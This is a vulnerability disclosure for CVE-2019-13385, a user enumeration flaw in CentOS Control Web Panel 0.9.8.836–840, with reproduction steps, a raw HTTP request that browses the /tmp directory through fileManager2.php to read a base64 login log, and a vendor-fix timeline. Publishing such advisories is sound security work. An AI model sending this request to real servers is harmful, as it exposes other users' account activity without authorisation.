CentOS Control Web Panel 0.9.8.840 User Enumeration

CentOS Control Web Panel (CWP) versions 0.9.8.836 through 0.9.8.840 suffer from a user enumeration vulnerability.


MD5 | b641e3a461a0d2b4932c082c36d4a365

# Exploit Title: CWP (CentOS Control Web Panel) User Enumeration
# Date: 23 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: 0.9.8.836 to 0.9.8.840
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13385

+++++++++++++++++++++++++++++++++
# Description:
+++++++++++++++++++++++++++++++++

An attacker who gains access as a low privilege user can check active users on the system by checking log file.
The access log is stored at /tmp directory with encoded content in base64 format.

+++++++++++++++++++++++++++++++++
# Steps to Reproduce
+++++++++++++++++++++++++++++++++

1. Login as a low privilege user
2. Browse to https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/username/fileManager2.php?frame=3&fm_current_dir=/tmp///
3. login log is login.log file in base64 format

Request:

GET /cwp_70b80498fb4cb150/user1/fileManager2.php?frame=3&fm_current_dir=/tmp/// HTTP/1.1
Host: 192.168.40.129:2083
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://192.168.40.129:2083/cwp_70b80498fb4cb150/user1/fileManager2.php?frame=2
Accept-Encoding: gzip, deflate
Accept-Language: en,th-TH;q=0.9,th;q=0.8

+++++++++++++++++++++++++++++++++
# PoC
+++++++++++++++++++++++++++++++++

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13385.md

+++++++++++++++++++++++++++++++++
# Timeline
+++++++++++++++++++++++++++++++++
2019-07-03: Discovered the bug
2019-07-03: Reported to vendor
2019-07-04: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-23: Published


+++++++++++++++++++++++++++++++++
# Discovered by
+++++++++++++++++++++++++++++++++
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

Related Posts